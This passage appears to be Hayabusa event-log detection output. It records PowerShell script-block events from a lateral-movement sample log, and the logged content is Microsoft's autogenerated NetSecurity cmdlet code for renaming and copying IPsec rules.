ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 